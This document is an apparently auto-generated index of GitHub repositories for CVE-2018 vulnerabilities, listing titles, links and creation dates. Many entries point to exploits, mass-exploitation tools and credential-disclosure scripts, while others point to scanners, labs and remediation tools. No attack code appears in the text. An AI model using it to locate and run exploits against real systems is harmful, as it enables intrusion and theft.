**SSH account enumeration verification script(CVE-2018-15473)** : [NHPT/SSH-account-enumeration-verification-script](https://api.github.com/repos/NHPT/SSH-account-enumeration-verification-script) create time: 2019-08-02T08:50:34Z

**CVE-2018-16509 Docker Playground - Ghostscript command execution** : [rhpco/CVE-2018-16509](https://api.github.com/repos/rhpco/CVE-2018-16509) create time: 2019-08-04T10:09:31Z

**exp for https://research.checkpoint.com/extracting-code-execution-from-winrar** : [WyAtu/CVE-2018-20250](https://api.github.com/repos/WyAtu/CVE-2018-20250) create time: 2019-02-22T04:52:08Z

**Multithreaded Padding Oracle Attack on Oracle OAM (CVE-2018-2879)** : [redtimmy/OAMBuster](https://api.github.com/repos/redtimmy/OAMBuster) create time: 2019-04-14T16:32:08Z

**CVE-2018-13382** : [milo2012/CVE-2018-13382](https://api.github.com/repos/milo2012/CVE-2018-13382) create time: 2019-08-11T11:13:44Z

**CVE-2018-13379** : [milo2012/CVE-2018-13379](https://api.github.com/repos/milo2012/CVE-2018-13379) create time: 2019-08-11T09:44:37Z

**None** : [aforakjackson/cve20186789](https://api.github.com/repos/aforakjackson/cve20186789) create time: 2019-08-22T01:03:50Z

**[CVE-2018-5728] Terminal Satelitales Seatel exponen geolocalización ** : [ezelf/seatel_terminals](https://api.github.com/repos/ezelf/seatel_terminals) create time: 2019-08-29T19:09:35Z

**webcam bug (python)** : [likaifeng0/CVE-2018-9995_dvr_credentials-dev_tool](https://api.github.com/repos/likaifeng0/CVE-2018-9995_dvr_credentials-dev_tool) create time: 2019-09-05T14:45:16Z

**None** : [0x6b7966/CVE-2018-1999002](https://api.github.com/repos/0x6b7966/CVE-2018-1999002) create time: 2019-09-10T05:23:48Z

**Weblogic,CVE-2018-2894** : [jas502n/CVE-2018-2894](https://api.github.com/repos/jas502n/CVE-2018-2894) create time: 2018-10-07T10:07:41Z

**Tool to exploit CVE-2018-7284 and CVE-2018-19278** : [Rodrigo-D/astDoS](https://api.github.com/repos/Rodrigo-D/astDoS) create time: 2019-09-15T17:20:51Z

**None** : [lawrenceamer/CVE-2018-7935](https://api.github.com/repos/lawrenceamer/CVE-2018-7935) create time: 2018-09-21T11:17:59Z

**Modified standalone exploit ported for Python 3** : [ivanitlearning/CVE-2018-12613](https://api.github.com/repos/ivanitlearning/CVE-2018-12613) create time: 2019-09-16T12:14:52Z

**None** : [InfoSecJack/CVE-2018-6574](https://api.github.com/repos/InfoSecJack/CVE-2018-6574) create time: 2019-09-19T14:36:45Z

**None** : [mdnix/cve-2018-1002105](https://api.github.com/repos/mdnix/cve-2018-1002105) create time: 2019-09-19T19:08:02Z

**CVE-2018-14667-poc Richfaces漏洞环境及PoC** : [Venscor/CVE-2018-14667-poc](https://api.github.com/repos/Venscor/CVE-2018-14667-poc) create time: 2019-09-23T07:45:01Z

**cve-2018-5724와 같은 증상으로 디폴트 계정을 통해 관리자외 계정들을 얻어내는 취약점** : [gusrmsdlrh/Python-CVE-Code](https://api.github.com/repos/gusrmsdlrh/Python-CVE-Code) create time: 2019-03-29T06:19:34Z

**CVE-2018-13379 Exploit** : [0xHunter/FortiOS-Credentials-Disclosure](https://api.github.com/repos/0xHunter/FortiOS-Credentials-Disclosure) create time: 2019-09-24T08:49:46Z

**Checks a list of SSH servers for password-based auth availability and for the existence of SSH user enumeration vulnerability (CVE-2018-15473) in those identified.** : [secmode/enumpossible](https://api.github.com/repos/secmode/enumpossible) create time: 2019-04-27T16:52:23Z

**None** : [BradyDonovan/CVE-2018-19592](https://api.github.com/repos/BradyDonovan/CVE-2018-19592) create time: 2018-11-20T06:51:16Z

**Weblogic 反序列化漏洞(CVE-2018-2628)** : [jas502n/CVE-2018-2628](https://api.github.com/repos/jas502n/CVE-2018-2628) create time: 2018-06-05T11:00:40Z

**PoC of CVE-2018-14847 Mikrotik Vulnerability using simple script** : [sinichi449/Python-MikrotikLoginExploit](https://api.github.com/repos/sinichi449/Python-MikrotikLoginExploit) create time: 2019-09-29T12:21:16Z

**None** : [VikasVarshney/CVE_2018_6574](https://api.github.com/repos/VikasVarshney/CVE_2018_6574) create time: 2019-06-17T05:31:34Z

**Investigation of CVE-2018-11776 vulnerability that allows attackers to remotely execute code and gain control over Apache Struts-based applications.** : [cucadili/CVE-2018-11776](https://api.github.com/repos/cucadili/CVE-2018-11776) create time: 2019-10-08T23:01:49Z

**PoC materials to exploit CVE-2018-6789** : [synacktiv/Exim-CVE-2018-6789](https://api.github.com/repos/synacktiv/Exim-CVE-2018-6789) create time: 2019-10-10T09:36:03Z

**CVE-2018-7600 and CVE-2018-7602 Mass Exploiter** : [shellord/Drupalgeddon-Mass-Exploiter](https://api.github.com/repos/shellord/Drupalgeddon-Mass-Exploiter) create time: 2019-10-10T11:56:29Z

**None** : [sharmasandeepkr/cve-2018-15968](https://api.github.com/repos/sharmasandeepkr/cve-2018-15968) create time: 2019-10-15T06:26:08Z

**None** : [sharmasandeepkr/PS-2017-13---CVE-2018-9950](https://api.github.com/repos/sharmasandeepkr/PS-2017-13---CVE-2018-9950) create time: 2019-10-15T06:47:00Z

**None** : [sharmasandeepkr/PS-2018-002---CVE-2018-14442](https://api.github.com/repos/sharmasandeepkr/PS-2018-002---CVE-2018-14442) create time: 2019-10-15T06:58:27Z

**None** : [sharmasandeepkr/cve-2018-9951](https://api.github.com/repos/sharmasandeepkr/cve-2018-9951) create time: 2019-10-15T07:02:34Z

**None** : [sharmasandeepkr/cve-2018-12798](https://api.github.com/repos/sharmasandeepkr/cve-2018-12798) create time: 2019-10-15T07:05:12Z

**None** : [sharmasandeepkr/cve-2018-8389](https://api.github.com/repos/sharmasandeepkr/cve-2018-8389) create time: 2019-10-15T07:09:02Z

**Opera Mini Location Permission Spoof Vulnerability** : [c0d3G33k/CVE-2018-16135](https://api.github.com/repos/c0d3G33k/CVE-2018-16135) create time: 2019-10-15T08:50:54Z

**Python RCE exploit for Apache Spark rewritten from Metasploit module** : [ivanitlearning/CVE-2018-11770](https://api.github.com/repos/ivanitlearning/CVE-2018-11770) create time: 2019-10-09T16:41:39Z

**None** : [aquasecurity/scan-cve-2018-8115](https://api.github.com/repos/aquasecurity/scan-cve-2018-8115) create time: 2018-05-08T20:24:23Z

**MASS Exploiter** : [shellord/CVE-2018-7600-Drupal-RCE](https://api.github.com/repos/shellord/CVE-2018-7600-Drupal-RCE) create time: 2018-10-02T04:25:02Z

**Rails Asset Pipeline Directory Traversal Vulnerability ** : [mpgn/CVE-2018-3760](https://api.github.com/repos/mpgn/CVE-2018-3760) create time: 2019-10-21T14:15:09Z

**None** : [SECFORCE/CVE-2018-1000082-exploit](https://api.github.com/repos/SECFORCE/CVE-2018-1000082-exploit) create time: 2019-10-22T13:02:02Z

**CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13** : [mpgn/CVE-2018-17246](https://api.github.com/repos/mpgn/CVE-2018-17246) create time: 2019-03-08T20:06:15Z

**None** : [cchang27/CVE-2018-11235-test](https://api.github.com/repos/cchang27/CVE-2018-11235-test) create time: 2019-10-29T04:49:45Z

**CVE-2018-6574 go get RCE** : [asavior2/CVE-2018-6574](https://api.github.com/repos/asavior2/CVE-2018-6574) create time: 2019-10-28T13:05:12Z

**Blind noSQL injection case study lab based on CVE-2018-3783** : [nisaruj/nosqli-flintcms](https://api.github.com/repos/nisaruj/nosqli-flintcms) create time: 2019-10-09T07:35:59Z

**PoC for CVE-2018-12086 affecting various OPC UA stacks** : [kevinherron/stack-overflow-poc](https://api.github.com/repos/kevinherron/stack-overflow-poc) create time: 2019-02-20T16:11:26Z

**CVE-2018-15473-Exploit** : [CaioCGH/EP4-redes](https://api.github.com/repos/CaioCGH/EP4-redes) create time: 2019-11-01T06:39:57Z

**CVE-2018-2893** : [ianxtianxt/CVE-2018-2893](https://api.github.com/repos/ianxtianxt/CVE-2018-2893) create time: 2019-11-05T14:22:04Z

**CVE-2018-3245** : [ianxtianxt/CVE-2018-3245](https://api.github.com/repos/ianxtianxt/CVE-2018-3245) create time: 2019-11-05T14:30:18Z

**None** : [create12138/CVE-2018-15982](https://api.github.com/repos/create12138/CVE-2018-15982) create time: 2019-11-06T09:08:04Z

**CVE-2018-15982_PoC** : [AirEvan/CVE-2018-15982_PoC](https://api.github.com/repos/AirEvan/CVE-2018-15982_PoC) create time: 2018-12-06T09:24:47Z

**load-scripts.php file, which purpose is to retrieve several JavaScript packages through one single request.** : [vineetkia/Wordpress-DOS-Attack-CVE-2018-6389](https://api.github.com/repos/vineetkia/Wordpress-DOS-Attack-CVE-2018-6389) create time: 2019-11-11T11:48:03Z

**Joomla内核SQL注入漏洞原理、docker及poc[基于pocsuite框架]** : [luckybool1020/CVE-2018-8045](https://api.github.com/repos/luckybool1020/CVE-2018-8045) create time: 2019-11-14T09:18:40Z

**OpenSSH 2.3 up to 7.4 Mass Username Enumeration (CVE-2018-15473).** : [trimstray/massh-enum](https://api.github.com/repos/trimstray/massh-enum) create time: 2018-08-17T23:48:15Z

**SpecuCheck is a Windows utility for checking the state of the software mitigations and hardware against CVE-2017-5754 (Meltdown), CVE-2017-5715 (Spectre v2), CVE-2018-3260 (Foreshadow), and CVE-2018-3639 (Spectre v4)** : [ionescu007/SpecuCheck](https://api.github.com/repos/ionescu007/SpecuCheck) create time: 2018-01-04T04:32:26Z

**Use this tool to prioritize cluster patching for the recent VMware advisory VMSA-2018-0027 related to CVE-2018-6981 and CVE-2018-6982.** : [heaphopopotamus/vmxnet3Hunter](https://api.github.com/repos/heaphopopotamus/vmxnet3Hunter) create time: 2018-11-13T18:47:37Z

**None** : [crispy-peppers/Libssh-server-CVE-2018-10933](https://api.github.com/repos/crispy-peppers/Libssh-server-CVE-2018-10933) create time: 2019-11-23T07:22:25Z

**Creating a vulnerable environment and the PoC ** : [xfox64x/CVE-2018-11776](https://api.github.com/repos/xfox64x/CVE-2018-11776) create time: 2018-08-23T20:06:17Z

**CVE-2018-18368 SEP Manager EoP Exploit** : [DimopoulosElias/SEPM-EoP](https://api.github.com/repos/DimopoulosElias/SEPM-EoP) create time: 2019-07-27T10:22:19Z

**test for CVE-2018-6574: go get RCE pentesterlab** : [drset/golang](https://api.github.com/repos/drset/golang) create time: 2019-11-29T14:12:57Z

**None** : [frozenkp/CVE-2018-6574](https://api.github.com/repos/frozenkp/CVE-2018-6574) create time: 2019-12-02T05:40:07Z

**a python script to exploit libssh authentication vulnerability** : [xFreed0m/CVE-2018-10933](https://api.github.com/repos/xFreed0m/CVE-2018-10933) create time: 2018-10-21T20:41:40Z

**Aggressor Script to launch IE driveby for CVE-2018-15982.** : [scanfsec/CVE-2018-15982](https://api.github.com/repos/scanfsec/CVE-2018-15982) create time: 2018-12-12T04:07:08Z

**Remediation task for CVE-2018-15686, CVE-2018-16866, and CVE-2018-16888 affecting SystemD in EL7** : [hpcprofessional/remediate_cesa_2019_2091](https://api.github.com/repos/hpcprofessional/remediate_cesa_2019_2091) create time: 2019-10-03T21:26:04Z

**Tools SQL Injection for CVE 2018-17254: Joomla Component JCKeditor 6.4.4 - 'parent' SQL Injection** : [FachrulRH/jckeditor](https://api.github.com/repos/FachrulRH/jckeditor) create time: 2019-11-14T14:25:45Z

**Tool to exploit CVE-2018-13341 and recover hidden account password on Crestron devices** : [axcheron/crestron_getsudopwd](https://api.github.com/repos/axcheron/crestron_getsudopwd) create time: 2019-12-13T01:27:36Z

**cve-2018-8453 exp** : [ze0r/cve-2018-8453-exp](https://api.github.com/repos/ze0r/cve-2018-8453-exp) create time: 2019-01-18T10:40:03Z

**CVE-2018-9995 POC** : [b510/CVE-2018-9995-POC](https://api.github.com/repos/b510/CVE-2018-9995-POC) create time: 2019-12-16T12:05:41Z

**CVE-2018-6389: WordPress <= 4.9.x 拒绝服务(DOS)漏洞** : [ianxtianxt/CVE-2018-6389](https://api.github.com/repos/ianxtianxt/CVE-2018-6389) create time: 2019-12-22T14:03:32Z

**pentesterlab test payload** : [kev-ho/cve-2018-6574-payload](https://api.github.com/repos/kev-ho/cve-2018-6574-payload) create time: 2020-01-02T09:03:25Z

**一款功能强大的漏洞扫描器,子域名爆破使用aioDNS,asyncio异步快速扫描,覆盖目标全方位资产进行批量漏洞扫描,中间件信息收集,自动收集ip代理,探测Waf信息时自动使用来保护本机真实Ip,在本机Ip被Waf杀死后,自动切换代理Ip进行扫描,Waf信息收集(国内外100+款waf信息)包括安全狗,云锁,阿里云,云盾,腾讯云等,提供部分已知waf bypass 方案,中间件漏洞检测(Thinkphp,weblogic等 CVE-2018-5955,CVE-2018-12613,CVE-2018-11759等),支持SQL注入, XSS, 命令执行,文件包含, ssrf 漏洞扫描, 支持自定义漏洞邮箱推送功能** : [YagamiiLight/Cerberus](https://api.github.com/repos/YagamiiLight/Cerberus) create time: 2019-12-21T22:45:55Z

**None** : [sdosis/cve-2018-6574](https://api.github.com/repos/sdosis/cve-2018-6574) create time: 2020-01-06T22:56:25Z

**PoC Exploiting SQL Injection in Android's Download Provider (CVE-2018-9493)** : [IOActive/AOSP-DownloadProviderDbDumper](https://api.github.com/repos/IOActive/AOSP-DownloadProviderDbDumper) create time: 2019-03-02T18:32:55Z

**PoC Exploiting Headers Disclosure in Android's Download Provider (CVE-2018-9546)** : [IOActive/AOSP-DownloadProviderHeadersDumper](https://api.github.com/repos/IOActive/AOSP-DownloadProviderHeadersDumper) create time: 2019-03-02T18:32:17Z

**PoC Exploiting Permission Bypass in Android's Download Provider (CVE-2018-9468)** : [IOActive/AOSP-DownloadProviderHijacker](https://api.github.com/repos/IOActive/AOSP-DownloadProviderHijacker) create time: 2019-03-02T18:31:11Z

**A proof of concept for ReadyAPI 2.5.0/2.6.0 Remote Code Execution Vulnerability.** : [gscamelo/CVE-2018-20580](https://api.github.com/repos/gscamelo/CVE-2018-20580) create time: 2019-05-03T17:53:17Z

**None** : [No1zy/CVE-2018-6574-PoC](https://api.github.com/repos/No1zy/CVE-2018-6574-PoC) create time: 2020-01-18T10:21:08Z

**Script to test for Cisco ASA path traversal vulnerability (CVE-2018-0296) and extract system information.** : [yassineaboukir/CVE-2018-0296](https://api.github.com/repos/yassineaboukir/CVE-2018-0296) create time: 2018-06-21T15:44:29Z

**None** : [Adelittle/Wordpressz_Dos_CVE_2018_6389](https://api.github.com/repos/Adelittle/Wordpressz_Dos_CVE_2018_6389) create time: 2019-12-08T05:37:32Z

**Python 2.7.14 race condition UAF proof-of-concept** : [tylepr96/CVE-2018-1000030](https://api.github.com/repos/tylepr96/CVE-2018-1000030) create time: 2020-02-10T12:48:31Z

**None** : [N0b1e6/CVE-2018-1335-Python3](https://api.github.com/repos/N0b1e6/CVE-2018-1335-Python3) create time: 2020-02-11T09:19:57Z

**Hack The CCTV | DVRs; Credentials Exposed | CVE-2018-9995** : [akuhidayat/HTC](https://api.github.com/repos/akuhidayat/HTC) create time: 2020-02-15T04:42:17Z

**这篇文章将分享一个phpMyAdmin 4.8.1版本的文件包含漏洞,从配置到原理,再到漏洞复现进行讲解,更重要的是让大家了解这些真实漏洞背后的知识。基础性文章,希望对您有所帮助!** : [eastmountyxz/CVE-2018-12613-phpMyAdmin](https://api.github.com/repos/eastmountyxz/CVE-2018-12613-phpMyAdmin) create time: 2020-02-19T05:41:11Z

**None** : [joegallagher4/CVE-2018-1288-](https://api.github.com/repos/joegallagher4/CVE-2018-1288-) create time: 2020-02-20T03:36:11Z

**CVE-2020-8012, CVE-2016-10709, CVE-2017-17099, CVE-2017-18047, CVE-2019-1003000, CVE-2018-1999002** : [wetw0rk/Exploit-Development](https://api.github.com/repos/wetw0rk/Exploit-Development) create time: 2017-04-26T02:03:43Z

**None** : [phongld97/detect-cve-2018-16858](https://api.github.com/repos/phongld97/detect-cve-2018-16858) create time: 2019-11-07T07:40:49Z

**This repository provides a learning environment to understand how an Exim RCE exploit for CVE-2018-6789 works.** : [martinclauss/exim-rce-cve-2018-6789](https://api.github.com/repos/martinclauss/exim-rce-cve-2018-6789) create time: 2020-03-02T16:53:02Z

**None** : [nthuong95/CVE-2018-6574](https://api.github.com/repos/nthuong95/CVE-2018-6574) create time: 2020-03-04T15:08:47Z

**None** : [nthuong95/CVE-2018-11235](https://api.github.com/repos/nthuong95/CVE-2018-11235) create time: 2020-03-05T05:43:00Z

**None** : [beraphin/CVE-2018-6789](https://api.github.com/repos/beraphin/CVE-2018-6789) create time: 2018-11-08T08:25:42Z

**None** : [AdriVillaB/CVE-2018-6574](https://api.github.com/repos/AdriVillaB/CVE-2018-6574) create time: 2020-03-06T16:17:07Z

**None** : [yitingfan/CVE-2018-6574_demo](https://api.github.com/repos/yitingfan/CVE-2018-6574_demo) create time: 2020-03-16T20:13:47Z

**WiFiRanger 7.0.8rc3 Incorrect Access Control - Privilege Escalation** : [Luct0r/CVE-2018-17873](https://api.github.com/repos/Luct0r/CVE-2018-17873) create time: 2020-03-16T00:44:28Z

**CVE 2018-16763** : [dinhbaouit/CVE-2018-16763](https://api.github.com/repos/dinhbaouit/CVE-2018-16763) create time: 2020-03-26T09:38:16Z

**从老外那里下载了该漏洞的修复工程,无奈依赖包实在是太多下不下来,选取其中axis工程打成jar包后发现已成功修复项目的漏洞,有需要的亲可以下载重新打jar包替换即可。 clone后用idea打axis这个jar包即可** : [cairuojin/CVE-2018-8032](https://api.github.com/repos/cairuojin/CVE-2018-8032) create time: 2020-03-30T06:31:49Z

**Authentication Bypass in Server Code for LibSSH** : [youkergav/CVE-2018-10933](https://api.github.com/repos/youkergav/CVE-2018-10933) create time: 2020-03-11T03:04:45Z

**Exploit for CVE-2018-4407-Memory Corruption** : [pwnhacker0x18/iOS-Kernel-Crash](https://api.github.com/repos/pwnhacker0x18/iOS-Kernel-Crash) create time: 2019-11-12T10:24:34Z

**CVE-2018-7600 Drupal Drupalgeddon 2 远程代码执行漏洞利用脚本** : [zhzyker/CVE-2018-7600-Drupal-POC-EXP](https://api.github.com/repos/zhzyker/CVE-2018-7600-Drupal-POC-EXP) create time: 2020-04-07T06:54:13Z

**None** : [Eugene24/CVE-2018-6574](https://api.github.com/repos/Eugene24/CVE-2018-6574) create time: 2020-04-08T11:33:46Z

**CVE-2018-12386 - Firefox Sandboxed RCE Exploit for Linux (Firefox <v62.0.3)** : [0xLyte/cve-2018-12386](https://api.github.com/repos/0xLyte/cve-2018-12386) create time: 2020-04-10T11:59:15Z

**Exploiting ring0 memcpy-like functionality to disable Driver Signing Enforcement (DSE)** : [ASkyeye/CVE-2018-19320](https://api.github.com/repos/ASkyeye/CVE-2018-19320) create time: 2020-04-13T11:34:24Z

**CVE-2018-7600【Drupal7】批量扫描工具。** : [rabbitmask/CVE-2018-7600-Drupal7](https://api.github.com/repos/rabbitmask/CVE-2018-7600-Drupal7) create time: 2020-04-12T07:37:14Z

**漏洞环境复现** : [scxiaotan1/Docker](https://api.github.com/repos/scxiaotan1/Docker) create time: 2020-04-17T02:51:07Z

**None** : [kristyna-mlcakova/CVE-2018-10933](https://api.github.com/repos/kristyna-mlcakova/CVE-2018-10933) create time: 2020-04-19T16:20:19Z

**None** : [JJSO12/Apache-Pluto-3.0.0--CVE-2018-1306](https://api.github.com/repos/JJSO12/Apache-Pluto-3.0.0--CVE-2018-1306) create time: 2020-04-24T06:34:55Z

**nvr漏洞** : [g5q2/cve-2018-9995](https://api.github.com/repos/g5q2/cve-2018-9995) create time: 2020-04-24T08:32:28Z

**CVE-2018-15133 (Webased)** : [iansangaji/laravel-rce-cve-2018-15133](https://api.github.com/repos/iansangaji/laravel-rce-cve-2018-15133) create time: 2020-04-27T16:12:27Z

**None** : [coblax/CVE-2018-6574](https://api.github.com/repos/coblax/CVE-2018-6574) create time: 2020-04-29T07:08:13Z

**Exploit for Red Hat / GlusterFS CVE-2018-1088 & CVE-2018-1112, featured @ DEFCON 26, Las Vegas!** : [MauroEldritch/GEVAUDAN](https://api.github.com/repos/MauroEldritch/GEVAUDAN) create time: 2018-06-11T02:18:05Z

**estudo da CVE-2018-10678** : [hbranco/CVE-2018-10678](https://api.github.com/repos/hbranco/CVE-2018-10678) create time: 2020-05-03T22:56:32Z

**CVE-2018-18649 EXP** : [Snowming04/CVE-2018-18649](https://api.github.com/repos/Snowming04/CVE-2018-18649) create time: 2020-05-07T07:37:34Z

**Project with sublist3r, massan, CVE-2018-15473, ssh bruteforce, ftp bruteforce and nikto.** : [Moon1705/easy_security](https://api.github.com/repos/Moon1705/easy_security) create time: 2020-05-08T10:29:00Z

**LEMPO (Ldap Exposure on POrtainer) is an exploit for CVE-2018-19466 (LDAP Credentials Disclosure on Portainer). Featured @ DevFest Siberia 2018** : [MauroEldritch/lempo](https://api.github.com/repos/MauroEldritch/lempo) create time: 2018-11-24T06:48:34Z

**None** : [lalishasanduwara/CVE-2018-10933](https://api.github.com/repos/lalishasanduwara/CVE-2018-10933) create time: 2020-05-12T15:34:48Z

**None** : [SachinThanushka/CVE-2018-1160](https://api.github.com/repos/SachinThanushka/CVE-2018-1160) create time: 2020-05-12T15:37:20Z

**CVE-2018-20250漏洞利用** : [lxg5763/cve-2018-20250](https://api.github.com/repos/lxg5763/cve-2018-20250) create time: 2020-05-13T03:28:04Z

**practice** : [0xddaa/CVE-2018-10388](https://api.github.com/repos/0xddaa/CVE-2018-10388) create time: 2020-05-13T14:52:43Z

**CVE-2018-10933_Scanner** : [JoSecMx/CVE-2018-10933_Scanner](https://api.github.com/repos/JoSecMx/CVE-2018-10933_Scanner) create time: 2020-05-15T17:18:31Z

**None** : [yukar1z0e/CVE-2018-14847](https://api.github.com/repos/yukar1z0e/CVE-2018-14847) create time: 2020-04-29T01:40:33Z

**这资源是作者复现微软签字证书漏洞CVE-2020-0601,结合相关资源及文章实现。推荐大家结合作者博客,复现了该漏洞和理解恶意软件自启动劫持原理。作为网络安全初学者,自己确实很菜,但希望坚持下去,一起加油!** : [eastmountyxz/CVE-2018-20250-WinRAR](https://api.github.com/repos/eastmountyxz/CVE-2018-20250-WinRAR) create time: 2020-02-17T15:08:22Z

**A fork of an old version of egg-scripts** : [erik-krogh/egg-scripts-CVE-2018-3786](https://api.github.com/repos/erik-krogh/egg-scripts-CVE-2018-3786) create time: 2020-05-19T12:21:16Z

**CVE-2018-6574** : [darthvader-htb/CVE-2018-6574](https://api.github.com/repos/darthvader-htb/CVE-2018-6574) create time: 2020-05-20T18:05:30Z

**None** : [yukar1z0e/CVE-2018-13379](https://api.github.com/repos/yukar1z0e/CVE-2018-13379) create time: 2020-05-18T01:37:13Z

**DVR-HACKING-HACK4LX** : [attakercyebr/hack4lx_CVE-2018-2019](https://api.github.com/repos/attakercyebr/hack4lx_CVE-2018-2019) create time: 2019-04-25T09:19:42Z

**Fortigate CVE-2018-13379 - Tool to search for vulnerable Fortigate hosts in Rapid7 Project Sonar data anonymously through The Tor network.** : [jpiechowka/at-doom-fortigate](https://api.github.com/repos/jpiechowka/at-doom-fortigate) create time: 2019-08-18T19:24:48Z

**Vulnerble-code** : [it3x55/CVE-2018-6574](https://api.github.com/repos/it3x55/CVE-2018-6574) create time: 2020-06-11T22:03:06Z

**None** : [freshdemo/ApacheStruts-CVE-2018-11776](https://api.github.com/repos/freshdemo/ApacheStruts-CVE-2018-11776) create time: 2020-06-12T18:46:29Z

**CVE-2018-9995 هک دوربین مداربسته با آسیب پذیری ** : [HACKGM/CVE-2018-9995](https://api.github.com/repos/HACKGM/CVE-2018-9995) create time: 2020-06-13T05:00:21Z

**CVE-2018-7600 0-Day Exploit (cyber-warrior.org)** : [ynsmroztas/drupalhunter](https://api.github.com/repos/ynsmroztas/drupalhunter) create time: 2020-06-18T08:12:44Z

**None** : [cyberharsh/Libssh-server-CVE-2018-10933](https://api.github.com/repos/cyberharsh/Libssh-server-CVE-2018-10933) create time: 2020-06-19T20:53:39Z

**None** : [cyberharsh/Mini_httpd-CVE-2018-18778](https://api.github.com/repos/cyberharsh/Mini_httpd-CVE-2018-18778) create time: 2020-06-20T09:47:56Z

**CVE-2018-6574: go get RCE solution for pentesterlab challenge** : [Malone5923/CVE-2018-6574-go-get-RCE](https://api.github.com/repos/Malone5923/CVE-2018-6574-go-get-RCE) create time: 2020-06-21T20:43:53Z

**None** : [sirius-bl4ck/cve2018-6574](https://api.github.com/repos/sirius-bl4ck/cve2018-6574) create time: 2020-07-02T10:23:25Z

**None** : [cyberharsh/DrupalCVE-2018-7602](https://api.github.com/repos/cyberharsh/DrupalCVE-2018-7602) create time: 2020-06-25T12:06:07Z

**CVE-2018-1297** : [xDro1d/CVE-2018-1297](https://api.github.com/repos/xDro1d/CVE-2018-1297) create time: 2020-07-11T04:11:19Z

**None** : [xElkomy/CVE-2018-11235](https://api.github.com/repos/xElkomy/CVE-2018-11235) create time: 2020-07-12T14:52:51Z

**Location tracking app without location permissions! Makes use of CVE-2018-15835 which makes use of Android OS information leakage.** : [Chirantar7004/Android-Passive-Location-Tracker](https://api.github.com/repos/Chirantar7004/Android-Passive-Location-Tracker) create time: 2020-07-13T20:43:36Z

**None** : [shivam18u/CVE-2018-6574](https://api.github.com/repos/shivam18u/CVE-2018-6574) create time: 2020-07-15T08:38:28Z

** CVE: 2018-15473** : [procamora/OpenSSH-Username-Enumeration](https://api.github.com/repos/procamora/OpenSSH-Username-Enumeration) create time: 2020-02-09T23:51:58Z

**EXP for CVE-2018-1297** : [Al1ex/CVE-2018-1297](https://api.github.com/repos/Al1ex/CVE-2018-1297) create time: 2020-07-16T06:20:01Z

**None** : [nondejus/CVE-2018-20586](https://api.github.com/repos/nondejus/CVE-2018-20586) create time: 2020-07-17T13:49:15Z

**None** : [illnino/CVE-2018-6574](https://api.github.com/repos/illnino/CVE-2018-6574) create time: 2020-07-20T21:02:43Z

**Ported Exploit From Python To Golang** : [latortuga71/CVE-2018-6892-Golang](https://api.github.com/repos/latortuga71/CVE-2018-6892-Golang) create time: 2020-07-20T23:50:41Z

**Fuel-Cms Rce Exploit (Single,Mass) Version: 1.4.2** : [SalimAlk/CVE-2018-16763-](https://api.github.com/repos/SalimAlk/CVE-2018-16763-) create time: 2020-04-05T23:13:17Z

**None** : [makeross/CVE-2018-11235](https://api.github.com/repos/makeross/CVE-2018-11235) create time: 2020-07-22T08:41:03Z

**None** : [makeross/CVE-2018-11235_pub](https://api.github.com/repos/makeross/CVE-2018-11235_pub) create time: 2020-07-22T09:05:45Z

**None** : [AnKItdo/CVE_2018-6574](https://api.github.com/repos/AnKItdo/CVE_2018-6574) create time: 2020-07-27T03:23:07Z

**Critical Remote Code Execution Vulnerability (CVE-2018-11776) Found in Apache Struts.** : [LightC0der/Apache-Struts-0Day-Exploit](https://api.github.com/repos/LightC0der/Apache-Struts-0Day-Exploit) create time: 2019-10-10T13:09:50Z

**None** : [ericisnotrealname/CVE-2018-8174_EXP](https://api.github.com/repos/ericisnotrealname/CVE-2018-8174_EXP) create time: 2020-07-31T03:13:43Z

**A WebUSB based payload launcher for devices vulnerable to CVE-2018-6242** : [ChrisFigura/react-tegra-payload-launcher](https://api.github.com/repos/ChrisFigura/react-tegra-payload-launcher) create time: 2020-05-12T20:39:24Z

**None** : [DreamoneOnly/CVE-2018-8120](https://api.github.com/repos/DreamoneOnly/CVE-2018-8120) create time: 2020-05-17T13:32:07Z

**漏洞复现** : [seethen/cve-2018-2628](https://api.github.com/repos/seethen/cve-2018-2628) create time: 2020-08-07T08:56:21Z

**None** : [cyberharsh/Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-](https://api.github.com/repos/cyberharsh/Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-) create time: 2020-06-24T12:15:07Z

**任意文件上传(Weblogic)CVE-2018-2894** : [changpin666com/CVE-2018-2894-Weblogic-](https://api.github.com/repos/changpin666com/CVE-2018-2894-Weblogic-) create time: 2020-08-11T04:12:09Z

**Script and metasploit module for CVE-2018-15982** : [kphongagsorn/adobe-flash-cve2018-15982](https://api.github.com/repos/kphongagsorn/adobe-flash-cve2018-15982) create time: 2018-12-11T16:31:21Z

**CVE-2018-7600 | Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' RCE** : [ruthvikvegunta/Drupalgeddon2](https://api.github.com/repos/ruthvikvegunta/Drupalgeddon2) create time: 2020-08-10T02:46:18Z

**A code demonstrating CVE-2018-0886** : [preempt/credssp](https://api.github.com/repos/preempt/credssp) create time: 2018-04-02T12:52:07Z

**Exploit written in Python for CVE-2018-15473 with threading and export formats** : [Rhynorater/CVE-2018-15473-Exploit](https://api.github.com/repos/Rhynorater/CVE-2018-15473-Exploit) create time: 2018-08-21T00:09:56Z

**None** : [Logeirs/CVE-2018-0114](https://api.github.com/repos/Logeirs/CVE-2018-0114) create time: 2020-08-18T00:52:39Z

**Kernel crash caused by out-of-bounds write in Apple's ICMP packet-handling code (CVE-2018-4407)** : [Fans0n-Fan/CVE-2018-4407](https://api.github.com/repos/Fans0n-Fan/CVE-2018-4407) create time: 2020-08-24T13:35:28Z

**This CVE-2018-8120 File** : [StartZYP/CVE-2018-8120](https://api.github.com/repos/StartZYP/CVE-2018-8120) create time: 2020-08-27T07:10:34Z

**None** : [TakuCoder/CVE-2018-6574](https://api.github.com/repos/TakuCoder/CVE-2018-6574) create time: 2020-08-28T11:32:45Z

**Jenkins远程代码执行** : [xDro1d/CVE-2018-1000861](https://api.github.com/repos/xDro1d/CVE-2018-1000861) create time: 2020-08-28T15:18:19Z

**CVE Repository for HTTP DeSynchronization Attacks** : [mosesrenegade/CVE-2018-8004](https://api.github.com/repos/mosesrenegade/CVE-2018-8004) create time: 2020-08-29T14:52:09Z

**Python script to generate malicious PDFs for foxit reader 9.0.1.1049 (CVE: 2018-9958) ** : [CrossedWires/foxit-pdf-generator](https://api.github.com/repos/CrossedWires/foxit-pdf-generator) create time: 2020-08-29T20:26:02Z

